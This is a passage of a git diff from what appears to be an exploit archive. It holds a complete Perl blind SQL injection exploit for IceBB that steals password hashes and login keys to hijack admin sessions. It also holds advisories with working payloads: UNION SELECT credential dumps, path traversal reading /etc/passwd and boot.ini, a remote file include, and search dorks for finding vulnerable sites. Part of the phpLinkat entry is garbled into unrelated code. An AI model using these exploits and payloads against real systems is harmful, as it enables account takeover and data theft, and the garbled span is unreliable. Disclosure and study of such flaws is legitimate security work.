-			        "OR+ASCII(SUBSTRING((SELECT+${field}+FROM+${prefix}users+WHERE+id=${id}),${n},1))=${char}%23");
-		
-	if($res->is_success)
-    	{
-		if($res->content !~ /No members were found that met your selected critera/ and $res->content =~ /
    Member list<\/h2>/)
-		{
-			 return $res->is_success; 	 
-		}
-	}
-	
-  return undef;
-}
-
-sub get_prefix()
-{
-  my $rv = "icebb";
-  
-	my $res = $lwp->get($target."index.php?act=members&username=%5c&url=OR+1");
-	
-	if($res->content =~ /as total FROM ([a-z]+)_users WHERE/)
-	{
-		$rv = $1;
-	}
-	
-  return $rv . '_';
-}
-
-sub get_username()
-{  
-  my $rv = undef;
-  my $res = $lwp->get($target."index.php?profile=${id}");
-	
-	if($res->is_success)
-	{
-		if($res->content =~ /
    View profile: (.+)<\/h2>/)
-		{
-			$rv = $1;
-		}
-		else
-		{
-			die "[-] Exploit mistake: user ${id} does not exists\n";
-		}
-	}
-	else
-	{
-		die "[-] Exploit mistake: could not connect to $target\n";
-	}
-	
-  return $rv;
- }
-
-sub banner
-{
-    print "\n";
-    print "[+] IceBB <= 1.0-RC9.2 Blind SQL Injection\n";
-    print "[+] Admin/User's Session Hijacking PoC\n";
-    print "[+] Coded by __GiReX__\n";
-    print "\n\n";
-}
-
-# milw0rm.com [2008-07-26]
+# Author:	__GiReX__		26/07/08
+# Homepage:	girex.altervista.org
+
+# CMS: 		IceBB <= 1.0-RC9.2
+# Site:		icebb.net
+
+# Bug: 		Blind SQL Injection
+# Exploit:	Session Hijacking PoC
+
+# Works regardless of php.ini settings
+
+
+# Description:
+	IceBB is a powerful, fast, free, and open-source forum solution powered by the free PHP and MySQL. 
+	IceBB scales well, no matter how many users or posts, due to its clean and efficient code. 
+	It can also be fully customized to your needs with full skin and language support. 
+	A powerful admin control center, along with easy-to-use moderation tools, 
+	allow you to easily manage all aspects of your forum.
+
+
+# Exploit Discussion:
+
+IceBB get all incoming data (GET/POST) in /includes/functions.php and store them into $input array (class std_func, function capture_input)
+
+# It "cleans" the string vars with this func:  lines  94-106
+
+94.	function clean_string($v)
+	{
+		if(get_magic_quotes_gpc())
+		{
+			$v = stripslashes($v);  <==   We don't need magic quotes = off  :P
+		}
+		
+		//$v	= htmlentities($v,ENT_QUOTES,'UTF-8');
+		$v	= htmlspecialchars($v,ENT_QUOTES);
+		$v	= preg_replace("/&#0*([0-9]*);?/",'&#\\1;',$v);
+		
+		return $v;
+106.	}
+
+
+So it fixes quotes chars... but what about backslashes?  -->  \  <---
+If i put a backslash at the end of an input that is between 2 quote in a query i can manipulate the query
+
+# Let's see:
+# "SELECT COUNT(*) as total FROM icebb_posts WHERE pauthor_id='{$icebb->input['author']}'"
+
+# Setting author=\  in this query:
+# "SELECT COUNT(*) as total FROM icebb_posts WHERE pauthor_id='\' "
+
+The end quote will be ignored and we get an error..
+
+How can we exploit that?
+In a query with 2 input..
+
+
+# File: /modules/memebers.php  lines 43-78
+
+	$fleh	= $icebb->input;  <==
+	...
+	foreach($fleh as $k => $g)
+	{	
+	 	...
+		$where_clauses[]  = "{$k}='{$g}'";  <==
+		...
+	}
+	...
+
+	$this->qwhere	= implode(' AND ',$where_clauses);
+	$total	= $db->fetch_result("SELECT COUNT(*) as total FROM icebb_users{$this->qwhere}{$qextra}"); <==
+
+In this query there can be more inputs (GET/POST) for example $username and $url.
+
+If we set username=\  the sintax after it will be quoted and became part of the string
+while from the next quote (the one that came before $url) will became SQL. (so the $url content).
+
+# For example:
+# GET /index.php?act=members&username=a\&url=OR+1#
+
+# Became:
+# "SELECT COUNT(*) as total FROM icebb_users WHERE user_group='a\' AND username='OR 1#' AND id!=0 ORDER BY username ASC"
+
+So whith the parameter $username we can manipulate the query...
+
+Unfortunally i could find only a Blind Sql Injection with this trick.. and.. 
+the passwords stored in db are hashed (md5) and salted.
+
+We can try to Hijacking admin/user's session...
+(but we can't access to admin area that needs special login).
+
+# The function autoLogin() in /includes/classes/login_func.php
+# is called if cookies ar set...  line 153-175
+
+153.function autoLogin()
+    {
+		global $icebb,$db,$config,$std;
+	
+		$uid				= $std->eatCookie('uid');
+		$login_key			= $std->eatCookie('login_key');
+	
+		$icebb->hooks->hook('login_autoLogin', $uid, $login_key);
+	
+		$userq				= $db->query("SELECT u.*,g.* FROM icebb_users AS u LEFT JOIN icebb_groups AS g ON u.user_group=g.gid WHERE u.id=".intval($uid)." AND u.login_key='{$login_key}' LIMIT 1");
+		$udata				= $db->fetch_row($userq);
+		
+		if($db->get_num_rows($userq)>=1)
+		{
+			if($std->eatCookie('pass')==$udata['password'])
+			{
+				$sessid		= md5(uniqid(microtime()));
+				$ip			= $icebb->client_ip;
+				$user_agent	= $std->clean_string($_SERVER['HTTP_USER_AGENT']);
+			
+				//$db->query("DELETE FROM icebb_session_data WHERE username='{$udata['username']}' OR ip='{$ip}'",1);
+
+175.			$sessdata	= $this->create_session($udata['username'],$udata['id'],false,true);
+
+
+If admin has cookies enabled we can login and create/edit/delete posts and topics.
+
+###############################  Perl Exploit Start #############################
+
+
+#!/usr/bin/perl
+# IceBB <= 1.0-RC9.2 Blind SQL Injection
+# Admin/User's Session Hijacking PoC
+# Coded by __GiReX__
+
+use LWP::UserAgent;
+ 
+if(not defined $ARGV[1])
+{
+	banner();
+	print "[+] Usage:\tperl  $0      [id]\n";
+	print "[+] Example:\tperl  $0  localhost  /icebb/ 1\n";
+	exit;
+}
+
+my $target  =  ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0].$ARGV[1]:  'http://' . $ARGV[0].$ARGV[1];
+my $id  =  (defined $ARGV[2]) ? $ARGV[2]: 1;  
+
+my $lwp =  new LWP::UserAgent;
+my @cset  =  (48..57, 97..102); 
+
+my ($hash, $key, $user, $prefix) =  (undef, undef, undef, undef);      
+
+banner();
+$user = get_username();
+$prefix =  get_prefix();
+
+print STDOUT "[+] User $id username: $user\n";
+	
+for(my $j = 1; $j <= 32; $j++)
+{  
+    foreach $char(@cset)
+    {	
+		info(chr($char), $hash, "password");
+		$rv = check_char($char, $j, "password");	
+	
+         	if(defined $rv)
+	     	{		
+	         	$hash .= chr($char);
+	         	last;
+	     	}
+    }
+	
+    last if $j > 2 and not defined $hash;
+}	
+
+if(not defined $hash or length($hash) != 32)
+{
+	print STDOUT "\n\n[-] Exploit mistake: probably fixed\n";
+	exit;
+}
+else
+{
+	print STDOUT "\n" x 1; 
+}
+
+for(my $j = 1; $j <= 32; $j++)
+{  
+    foreach $char(@cset)
+    {	
+	  info(chr($char), $key, "loginkey");
+	  $rv = check_char($char, $j, "login_key");	
+	
+          if(defined $rv)
+	  {		
+	       $key .= chr($char);
+	       last;
+	  }
+    }
+	
+    last if $j > 2 and not defined $key;
+}
+
+if(not defined $key or length($key) != 32)
+{
+     print STDOUT "\n\n[-] Exploit mistake: user $id has not a login_key\n";
+     exit;
+}
+
+print "\n\n[+] Attempting to login with user's $id session...\n\n";
+
+$logged = try_login();
+
+if(defined $logged) 
+{
+	print STDOUT "[+] Oh yeah logged in!\n\n";
+	print STDOUT "[+] Try yourself with your browser and these cookies:\n\n";
+	print STDOUT "[+] Cookie: ${prefix}user=${user}; ${prefix}pass=${hash}; \n".
+			 "            ${prefix}uid=${id}; ${prefix}login_key=${key}\n\n";
+}
+else
+{
+	print STDOUT "[-] Attempt failed...\n\n";
+}
+
+print STDOUT "[+] Exploit terminated\n";
+
+
+sub try_login()
+{
+   my $lwp = new LWP::UserAgent;
+      $lwp->default_header('Cookie' => "${prefix}user=${user}; ${prefix}pass=${hash}; ${prefix}uid=${id}; ${prefix}login_key=${key}"); 
+	  
+	  my $res = $lwp->get($target);
+	  
+	  if($res->is_success)
+	  {
+		  if($res->content =~ /User Control Panel/)
+		  {
+			    return 1;
+		  }
+	  }
+	
+  return undef;
+}
+
+sub info
+{
+  my($c, $cur, $str)  =  @_;
+	
+	$cur = '' unless defined $cur;
+	print  STDOUT "[+] User $id ${str}: ${cur}${c}\r";
+	
+  $| = 1; 
+}
+
+sub check_char
+{
+  my ($char, $n, $field)  =  @_ ;
+   
+    my $res = $lwp->get($target."index.php?act=members&username=%5c&url=".
+			        "OR+ASCII(SUBSTRING((SELECT+${field}+FROM+${prefix}users+WHERE+id=${id}),${n},1))=${char}%23");
+		
+	if($res->is_success)
+    	{
+		if($res->content !~ /No members were found that met your selected critera/ and $res->content =~ /
    Member list<\/h2>/)
+		{
+			 return $res->is_success; 	 
+		}
+	}
+	
+  return undef;
+}
+
+sub get_prefix()
+{
+  my $rv = "icebb";
+  
+	my $res = $lwp->get($target."index.php?act=members&username=%5c&url=OR+1");
+	
+	if($res->content =~ /as total FROM ([a-z]+)_users WHERE/)
+	{
+		$rv = $1;
+	}
+	
+  return $rv . '_';
+}
+
+sub get_username()
+{  
+  my $rv = undef;
+  my $res = $lwp->get($target."index.php?profile=${id}");
+	
+	if($res->is_success)
+	{
+		if($res->content =~ /
    View profile: (.+)<\/h2>/)
+		{
+			$rv = $1;
+		}
+		else
+		{
+			die "[-] Exploit mistake: user ${id} does not exists\n";
+		}
+	}
+	else
+	{
+		die "[-] Exploit mistake: could not connect to $target\n";
+	}
+	
+  return $rv;
+ }
+
+sub banner
+{
+    print "\n";
+    print "[+] IceBB <= 1.0-RC9.2 Blind SQL Injection\n";
+    print "[+] Admin/User's Session Hijacking PoC\n";
+    print "[+] Coded by __GiReX__\n";
+    print "\n\n";
+}
+
+# milw0rm.com [2008-07-26]
diff --git a/platforms/php/webapps/6138.txt b/platforms/php/webapps/6138.txt
index 01ea1605d..98cd16c3f 100755
--- a/platforms/php/webapps/6138.txt
+++ b/platforms/php/webapps/6138.txt
@@ -1,35 +1,35 @@
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- #################################################################
- #   [ Mobius <= 1.4.4.1 ]   Remote SQL Injection Vulnerability  #
- #################################################################
- # 
- # [ Script: Mobius Web Publishing Software ]
- #
- # [ Script site: http://www.willo.com/mimsy_xg/mobius.asp ]
- # 
- # [ Default table_name with users: Webusers ]
- # 
- # [ Vuln: browse.php ] http://site.com/browse.php?id=-1+UNION+SELECT+concat_ws(char(58),USID,EMAIL,SUPERSECRETPASSWORD,ADMIN)+from+Webusers+limit+0,1/* 	
- #	
- # [ Vuln: detail.php ] http://site.com/mobius_path/detail.php?t=exhibitions&type=exh&f=&s=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/* 
- # *[ in other version of Mobius, number of columns may be different ]* 
- # 
- # [ Dork example: "This website is powered by Mobius" ]
- #
- #####################################################
- # Greetz: D3m0n_DE * Voo|doo * str0ke and otherz..
- #####################################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-07-26]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ #################################################################
+ #   [ Mobius <= 1.4.4.1 ]   Remote SQL Injection Vulnerability  #
+ #################################################################
+ # 
+ # [ Script: Mobius Web Publishing Software ]
+ #
+ # [ Script site: http://www.willo.com/mimsy_xg/mobius.asp ]
+ # 
+ # [ Default table_name with users: Webusers ]
+ # 
+ # [ Vuln: browse.php ] http://site.com/browse.php?id=-1+UNION+SELECT+concat_ws(char(58),USID,EMAIL,SUPERSECRETPASSWORD,ADMIN)+from+Webusers+limit+0,1/* 	
+ #	
+ # [ Vuln: detail.php ] http://site.com/mobius_path/detail.php?t=exhibitions&type=exh&f=&s=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/* 
+ # *[ in other version of Mobius, number of columns may be different ]* 
+ # 
+ # [ Dork example: "This website is powered by Mobius" ]
+ #
+ #####################################################
+ # Greetz: D3m0n_DE * Voo|doo * str0ke and otherz..
+ #####################################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-07-26]
diff --git a/platforms/php/webapps/6139.txt b/platforms/php/webapps/6139.txt
index 9ed3fdff8..b3627f19f 100755
--- a/platforms/php/webapps/6139.txt
+++ b/platforms/php/webapps/6139.txt
@@ -1,26 +1,26 @@
-########################################################################################
-#
-# [+]  Name   : EPShop < 3.0 (pid) Remote SQL Injection Vulnerability
-# [+]  Author : mikeX - http://www.cyber-underground.net / m$n: mikeX[at]fuckoff[dot]com
-# [+]  Dork(s): ?action=pro_show and ?action=disppro
-# [+]  Greetz : Ciaran McG, -Witch-Doct0r, K_n, MegaByte, Squibs, cIpheR, mmmbud, RoMeo
-#
-########################################################################################
-
-
-Information;
-
-    You can't download a copy coz it's now known as ECShop - http://comsenz.com/products/ecshop
-    They stopped supporting the old version a while ago.
-
-Exploit;
-
-    SQL #1: http://www.target.com/?action=pro_show&pid=[SQL Injection]
-    SQL #2: http://www.target.com/?action=disppro&pid=[SQL Injection]
-
-Live Examples;
-
-    http://www.xxx.net/?action=pro_show&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6+FROM+admin--
-    http://www.xxx.com/?action=disppro&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13+FROM+admin--
-
-# milw0rm.com [2008-07-26]
+########################################################################################
+#
+# [+]  Name   : EPShop < 3.0 (pid) Remote SQL Injection Vulnerability
+# [+]  Author : mikeX - http://www.cyber-underground.net / m$n: mikeX[at]fuckoff[dot]com
+# [+]  Dork(s): ?action=pro_show and ?action=disppro
+# [+]  Greetz : Ciaran McG, -Witch-Doct0r, K_n, MegaByte, Squibs, cIpheR, mmmbud, RoMeo
+#
+########################################################################################
+
+
+Information;
+
+    You can't download a copy coz it's now known as ECShop - http://comsenz.com/products/ecshop
+    They stopped supporting the old version a while ago.
+
+Exploit;
+
+    SQL #1: http://www.target.com/?action=pro_show&pid=[SQL Injection]
+    SQL #2: http://www.target.com/?action=disppro&pid=[SQL Injection]
+
+Live Examples;
+
+    http://www.xxx.net/?action=pro_show&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6+FROM+admin--
+    http://www.xxx.com/?action=disppro&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13+FROM+admin--
+
+# milw0rm.com [2008-07-26]
diff --git a/platforms/php/webapps/6140.txt b/platforms/php/webapps/6140.txt
index 38daf492c..569d1a76d 100755
--- a/platforms/php/webapps/6140.txt
+++ b/platforms/php/webapps/6140.txt
@@ -1,38 +1,38 @@
-######## ##    ##  ######  ########  ##    ## ########  ########  #######  ######## 
-##       ###   ## ##    ## ##     ##  ##  ##  ##     ##    ##    ##     ## ##     ##
-##       ####  ## ##       ##     ##   ####   ##     ##    ##           ## ##     ##
-######   ## ## ## ##       ########     ##    ########     ##     #######  ##     ##
-##       ##  #### ##       ##   ##      ##    ##           ##           ## ##     ##
-##       ##   ### ##    ## ##    ##     ##    ##           ##    ##     ## ##     ##
-######## ##    ##  ######  ##     ##    ##    ##           ##     #######  ######## 
-################################ !R4Q!4N H4CK3R  ###################################
-#
-# phpLinkat 0.1 Insecure Cookie Handling Vulnerability & Sql Injection Exploit
-#
-# Founded By : Encrypt3d.M!nd
-#              encrypt3d.blogspot.com
-#
-# Dork : "Powered by DesClub.com - phpLinkat"
-
-# Description :
-  
-   phpLinkat is a free link indexing script written in PHP and
-   runs on MySQL.This script is suffering a sql injection bug
-   and insecure cookie handling.
-
-# phpLinkat : Sql Injection Exploit
-    PoC :www.site.com/phpLinkat/showcat.php?catid=666%20union%20select%20concat(version(),0x3a,database(),0x3a,user()),2,3,4,5,6/*
-
-# phpLinkat : Insecure Cookie Handling
- 
-  /admin/login2.php: 
-  6 : if( ($username == $cpusername) && ($password == $cppassword) ){
-  7 :  setcookie("login","right");  <<< wtf!!
-  8 :  echo <<array('NL','Nederlands'),
-                                          'english'=>array('EN','English'),
-                                          'french'=>array('FR','Francais'),
-                                          'german'=>array('DE','Deutsch'),
-                                          'italian'=>array('IT','Italiano'),
-                                          'norwegian'=>array('NO','Norsk'),
-                                          'persian'=>array('FA','Farsi'),
-                                          'polish'=>array('PL','Polskiego'),
-                                          'portuguese'=>array('PT','Portugues'),
-                                          'simplified_chinese'=>array('CN','Chinese'),
-                                          'spanish'=>array('ES','Espanol'),
-                                          'swedish'=>array('SE','Svenska'),
-                                          'danish'=>array('DK','Dansk'),
-                                          'japanese'=>array('JP','Japanese'),
-                                          'hungarian'=>array('HU','Magyar'),
-                                          'romanian'=>array('RO','Romana'),
-                                          'russian'=>array('RU','Russian'),
-                                          'czech'=>array('CS','Cesky')
-                                         );
-...
-if(isset($_GET['lang'])) { $language_abr = substr($_GET['lang'],0,2); }
-
-foreach ($PP_supp_lang as $key => $row) {
-        foreach($row as $cell){
-                if ($cell == strtoupper($language_abr)) { $language_full = $key; }
-        }
-}
-...
-if(!empty($language_full)) {
-        if(file_exists("language/lang-".$language_full.".php")) {
-
-                if( !isset($_GET['x'])OR($_GET['x'] != "rss" & $_GET['x'] != "atom")) {
-                        require("language/lang-".$language_full.".php");
-                }
-        }else{
-        ...
-
-#################################################
-
-Example:
-
-http://[server]/[installdir]/index.php?lang=DSecRG&language_full=../../../../../../../../../../../../../boot.ini%00
-
-
-
-Solution
-********
-
-Vendor fix this flaw on 27.07.2008. Security Patch can be downloaded here:
-
-http://www.pixelpost.org/blog/2008/07/27/pixelpost-171-security-patch/
-
-
-
-About
-*****
-
-Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
-
-
-Contact:    research [at] dsec [dot] ru
-            http://www.dsec.ru (in Russian)
-
-# milw0rm.com [2008-07-28]
+Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-033
+
+
+Application:                    Pixelpost photoblog
+Versions Affected:              1.7.1
+Vendor URL:                     http://www.pixelpost.org/
+Bug:                            Local File Include
+Exploits:                       YES
+Reported:                       22.07.2008
+Vendor response:                23.07.2008
+Solution:                       YES
+Date of Public Advisory:        28.07.2008
+Authors:                        Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
+
+
+
+Description
+***********
+
+Pixelpost photoblog has local file include vulnerability in script index.php
+
+Successful exploitation requires that "register_globals" is enabled.
+
+Code
+****
+#################################################
+
+$PP_supp_lang = array('dutch'=>array('NL','Nederlands'),
+                                          'english'=>array('EN','English'),
+                                          'french'=>array('FR','Francais'),
+                                          'german'=>array('DE','Deutsch'),
+                                          'italian'=>array('IT','Italiano'),
+                                          'norwegian'=>array('NO','Norsk'),
+                                          'persian'=>array('FA','Farsi'),
+                                          'polish'=>array('PL','Polskiego'),
+                                          'portuguese'=>array('PT','Portugues'),
+                                          'simplified_chinese'=>array('CN','Chinese'),
+                                          'spanish'=>array('ES','Espanol'),
+                                          'swedish'=>array('SE','Svenska'),
+                                          'danish'=>array('DK','Dansk'),
+                                          'japanese'=>array('JP','Japanese'),
+                                          'hungarian'=>array('HU','Magyar'),
+                                          'romanian'=>array('RO','Romana'),
+                                          'russian'=>array('RU','Russian'),
+                                          'czech'=>array('CS','Cesky')
+                                         );
+...
+if(isset($_GET['lang'])) { $language_abr = substr($_GET['lang'],0,2); }
+
+foreach ($PP_supp_lang as $key => $row) {
+        foreach($row as $cell){
+                if ($cell == strtoupper($language_abr)) { $language_full = $key; }
+        }
+}
+...
+if(!empty($language_full)) {
+        if(file_exists("language/lang-".$language_full.".php")) {
+
+                if( !isset($_GET['x'])OR($_GET['x'] != "rss" & $_GET['x'] != "atom")) {
+                        require("language/lang-".$language_full.".php");
+                }
+        }else{
+        ...
+
+#################################################
+
+Example:
+
+http://[server]/[installdir]/index.php?lang=DSecRG&language_full=../../../../../../../../../../../../../boot.ini%00
+
+
+
+Solution
+********
+
+Vendor fix this flaw on 27.07.2008. Security Patch can be downloaded here:
+
+http://www.pixelpost.org/blog/2008/07/27/pixelpost-171-security-patch/
+
+
+
+About
+*****
+
+Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
+
+
+Contact:    research [at] dsec [dot] ru
+            http://www.dsec.ru (in Russian)
+
+# milw0rm.com [2008-07-28]
diff --git a/platforms/php/webapps/6153.txt b/platforms/php/webapps/6153.txt
index 134bfe782..d8736fb06 100755
--- a/platforms/php/webapps/6153.txt
+++ b/platforms/php/webapps/6153.txt
@@ -1,31 +1,31 @@
-#####################################################################################
-####                         ATutor Course Server Rfi                            ####
-#####################################################################################
-#                                                                                   #
-#AUTHOR : IRCRASH (R3d.W0rm)                                                        #
-#Discovered by : IRCRASH (R3d.W0rm)                                                 #
-#Our Site : Http://IRCRASH.COM                                                      #
-#IRCRASH Team Members : Dr.Crash - R3d.w0rm                                         #
-#####################################################################################
-#                                                                                   #
-#Script Download : www.atutor.ca                                                    #
-#                                                                                   #
-#DORK : "Web site engine's code is copyright © 2001-2007 ATutor®"                   #
-#                                                                                   #
-#Note : You must login , then use rfi bug  ;)                                       #
-#####################################################################################
-#                                       [Rfi]                                       #
-#                                                                                   #
-#http://Example/tools/packages/import.php                                           #
-#                                                                                   #
-#                                    [Valun Code]                                   #
-#  ....                                                                             #
-# if (isset ($_POST['type'])) {                                                     #
-#	require ($_POST['type'] . '/import.php');                                   #
-#}                                                                                  #
-#  ....                                                                             #
-#####################################################################################
-#                           Site : Http://IRCRASH.COM                               #
-###################################### TNX GOD ######################################
-
-# milw0rm.com [2008-07-28]
+#####################################################################################
+####                         ATutor Course Server Rfi                            ####
+#####################################################################################
+#                                                                                   #
+#AUTHOR : IRCRASH (R3d.W0rm)                                                        #
+#Discovered by : IRCRASH (R3d.W0rm)                                                 #
+#Our Site : Http://IRCRASH.COM                                                      #
+#IRCRASH Team Members : Dr.Crash - R3d.w0rm                                         #
+#####################################################################################
+#                                                                                   #
+#Script Download : www.atutor.ca                                                    #
+#                                                                                   #
+#DORK : "Web site engine's code is copyright © 2001-2007 ATutor®"                   #
+#                                                                                   #
+#Note : You must login , then use rfi bug  ;)                                       #
+#####################################################################################
+#                                       [Rfi]                                       #
+#                                                                                   #
+#http://Example/tools/packages/import.php                                           #
+#                                                                                   #
+#                                    [Valun Code]                                   #
+#  ....                                                                             #
+# if (isset ($_POST['type'])) {                                                     #
+#	require ($_POST['type'] . '/import.php');                                   #
+#}                                                                                  #
+#  ....                                                                             #
+#####################################################################################
+#                           Site : Http://IRCRASH.COM                               #
+###################################### TNX GOD ######################################
+
+# milw0rm.com [2008-07-28]
diff --git a/platforms/php/webapps/6154.txt b/platforms/php/webapps/6154.txt
index c0c84856c..52413df46 100755
--- a/platforms/php/webapps/6154.txt
+++ b/platforms/php/webapps/6154.txt
@@ -1,66 +1,66 @@
-##########################################################
-# GulfTech Security Research                July 28, 2008
-##########################################################
-# Vendor : ViArt, Ltd
-# URL : http://www.viart.com/
-# Version : ViArt Shop <= 3.5
-# Risk : SQL Injection
-##########################################################
-
-
-Description:
-ViArt Shop is a full featured online ecommerce solution written
-in php. There is a high risk SQL Injection in ViArt that allows
-for an attacker to take over the ViArt installation. This
-vulnerability is present regardless of magic_quotes configuration.
-An updated version of ViArt has been released and all users are
-encouraged to upgrade their ViArt installation as soon as possible.
-
-
-SQL Injection:
-There is a high risk SQL Injection vulnerability in ViArt that
-allows for an attacker to run arbitrary queries via a malicious
-request. The vulnerable code can be found in "products_rss.php".
-As seen below the "$category_id" variable is never sanitized within
-the query, and is never sanitized prior to that point either.
-
-if ($category_id == 0){
-    $sql = "SELECT category_id, friendly_url FROM " . $table_prefix . "categories WHERE category_path like '%".$category_id.",%' AND is_showing = 1 ";
-} else {
-    $sql = "SELECT category_id, friendly_url FROM " . $table_prefix . "categories WHERE category_path like '%,".$category_id.",%' AND is_showing = 1 ";
-}
-
-This allows for an attacker to easily select arbitrary data
-from the database such as usernames,passwords, and even credit
-card information. it should also be noted that ViArt strips
-slashes from within the get_param() function, so magic_quotes
-does not prevent this SQL Injection from happening.
-
-/products_rss.php?category_id=1' UNION SELECT concat(login,char(58),password),0 FROM va_admins -- /*
-
-A url like the one above will successfully grab the admin info
-from the database, and then attempt to use the admin data in a
-query, where it will then error. Still, the admin credentials
-will be displayed in the SQL Error as part of the faulty query
-and visible to the attacker. It is also worth mentioning that
-ViArt stores all credentials in plain text, so once an attacker
-has the credentials he is guaranteed access to the application.
-
-
-
-Solution:
-The ViArt developers have released a patch for the vulnerable
-ViArt 3.5. Users are encouraged t upgrade as soon as possible.
-
-
-
-Credits:
-James Bercegay of the GulfTech Security Research Team
-
-
-
-Related Info:
-The original advisory can be found at the following location
-http://www.gulftech.org/?node=research&article_id=00118-07292008
-
-# milw0rm.com [2008-07-28]
+##########################################################
+# GulfTech Security Research                July 28, 2008
+##########################################################
+# Vendor : ViArt, Ltd
+# URL : http://www.viart.com/
+# Version : ViArt Shop <= 3.5
+# Risk : SQL Injection
+##########################################################
+
+
+Description:
+ViArt Shop is a full featured online ecommerce solution written
+in php. There is a high risk SQL Injection in ViArt that allows
+for an attacker to take over the ViArt installation. This
+vulnerability is present regardless of magic_quotes configuration.
+An updated version of ViArt has been released and all users are
+encouraged to upgrade their ViArt installation as soon as possible.
+
+
+SQL Injection:
+There is a high risk SQL Injection vulnerability in ViArt that
+allows for an attacker to run arbitrary queries via a malicious
+request. The vulnerable code can be found in "products_rss.php".
+As seen below the "$category_id" variable is never sanitized within
+the query, and is never sanitized prior to that point either.
+
+if ($category_id == 0){
+    $sql = "SELECT category_id, friendly_url FROM " . $table_prefix . "categories WHERE category_path like '%".$category_id.",%' AND is_showing = 1 ";
+} else {
+    $sql = "SELECT category_id, friendly_url FROM " . $table_prefix . "categories WHERE category_path like '%,".$category_id.",%' AND is_showing = 1 ";
+}
+
+This allows for an attacker to easily select arbitrary data
+from the database such as usernames,passwords, and even credit
+card information. it should also be noted that ViArt strips
+slashes from within the get_param() function, so magic_quotes
+does not prevent this SQL Injection from happening.
+
+/products_rss.php?category_id=1' UNION SELECT concat(login,char(58),password),0 FROM va_admins -- /*
+
+A url like the one above will successfully grab the admin info
+from the database, and then attempt to use the admin data in a
+query, where it will then error. Still, the admin credentials
+will be displayed in the SQL Error as part of the faulty query
+and visible to the attacker. It is also worth mentioning that
+ViArt stores all credentials in plain text, so once an attacker
+has the credentials he is guaranteed access to the application.
+
+
+
+Solution:
+The ViArt developers have released a patch for the vulnerable
+ViArt 3.5. Users are encouraged t upgrade as soon as possible.
+
+
+
+Credits:
+James Bercegay of the GulfTech Security Research Team
+
+
+
+Related Info:
+The original advisory can be found at the following location
+http://www.gulftech.org/?node=research&article_id=00118-07292008
+
+# milw0rm.com [2008-07-28]
diff --git a/platforms/php/webapps/6156.txt b/platforms/php/webapps/6156.txt
index 951875477..a3d3f13c2 100755
--- a/platforms/php/webapps/6156.txt
+++ b/platforms/php/webapps/6156.txt
@@ -1,68 +1,68 @@
-Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-034
-
-
-Application:                    Minishowcase Image Gallery      
-Versions Affected:              v09b136
-Vendor URL:                     http://minishowcase.frwrd.net
-Bug:                            Local File Include
-Exploits:                       YES
-Reported:                       14.07.2008
-Second report:                  22.07.2008
-Vendor response:                NONE
-Solution:                       NONE
-Date of Public Advisory:        29.07.2008
-Authors:                        Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
-
-
-
-Description
-***********
-
-Minishowcase Image Gallery has local file include vulnerability in script libraries/general.init.php
-
-Vulnerable GET parameters "lang".
-
-Successful exploitation requires that "register_globals" is enabled.
-
-Code
-****
-#################################################
-
-...
-        $_dir_file = dirname(dirname(__FILE__));
-        $_dir_path = dirname($_SERVER["DOCUMENT_ROOT"] . $_SERVER['PHP_SELF']);
-        
-        if ($_dir_file != $_dir_path) {
-                if (!isset($settings['minishowcase_url'])
-                        || ($settings['minishowcase_url'] == "")) {
-                        die ("
    ALERT: if you are including minishowcase with PHP into a website, please set the \$minishowcase_url variable in the /config/settings.php file
    ");
-                }
-        }
-...
-        if (isset($_GET["lang"])) $set_language = $_GET["lang"];
-        $langfile = ROOT.'languages/'.$set_language.'.php';
-        require_once($langfile);
-
-#################################################
-
-Example:
-
-http://[server]/[installdir]/libraries/general.init.php?settings[minishowcase_url]=DSecRG&lang=../../../../../../../../../../../../../etc/passwd%00
-
-
-Solution
-********
-
-No response or any updates from vendor.
-
-
-About
-*****
-
-Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
-
-
-Contact:    research [at] dsec [dot] ru
-            http://www.dsec.ru (in Russian)
-
-# milw0rm.com [2008-07-29]
+Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-034
+
+
+Application:                    Minishowcase Image Gallery      
+Versions Affected:              v09b136
+Vendor URL:                     http://minishowcase.frwrd.net
+Bug:                            Local File Include
+Exploits:                       YES
+Reported:                       14.07.2008
+Second report:                  22.07.2008
+Vendor response:                NONE
+Solution:                       NONE
+Date of Public Advisory:        29.07.2008
